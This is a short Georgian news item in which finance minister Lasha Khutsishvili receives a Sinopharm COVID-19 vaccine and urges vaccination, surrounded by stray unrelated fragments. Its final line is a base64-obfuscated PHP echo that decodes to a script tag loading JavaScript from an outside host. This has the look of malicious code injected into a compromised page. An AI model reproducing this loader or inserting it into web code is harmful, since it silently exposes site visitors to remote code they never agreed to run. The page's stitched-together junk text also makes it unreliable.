celsiusi
ავერსი შნაიდერი
საქართველოს ფინანსთა მინისტრი ლაშა ხუციშვილი დღეს ნიკოლოზ ყიფშიძის სახელობის ცენტრალურ საუნივერსიტეტო კლინიკაში „სინოფარმის“ კორონავირუსის საწინააღმდეგო ვაქცინით აიცრა.
 
როგორც მან აღნიშნა, იმუნიზაციის პროცესი ძალიან მნიშვნელოვანია და ვისაც აქვს შესაძლებლობა და შესაბამისი რეკომენდაცია მედიკოსებისგან, აცრა უნდა გაიკეთოს. 
 
„პირველ რიგში, მინდა აღვნიშნო, რომ არანაირი მნიშვნელობა არ აქვს ვაქცინის დასახელებას და წარმოშობას იმ შემთხვევაში, როდესაც უკვე მილიონობით ადამიანია აცრილი კონკრეტული ვაქცინით. ვაქცინა არის კარგი! შესაბამისად, შეგვიძლია ვენდოთ ვაქცინაციის პროცესს. ძალიან მნიშვნელოვანია ის, რომ ვაქცინაციით შესაძლებელია ასობით და ათასობით ადამიანის სიცოცხლის გადარჩენა. ამ კონკრეტულ შემთხვევაში ავიცერი „სინოფარმის“ წარმოების ვაქცინით, თუმცა კიდევ ერთხელ ვიმეორებ ამას არანაირი მნიშვნელობა არ აქვს ვაქცინის დასახელებას. 
 
ყველა ვაქცინა მისაღებია და ყველა ვაქცინით შესაძლებელია იმ მიზნის მიღწევა, რაც არის დასახული - კონკრეტულად კი, ადამიანების სიცოცხლის გადარჩენა“, - განაცხადა  ფინანსთა მინისტრმა ლაშა ხუციშვილმა.
 
 
1445
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");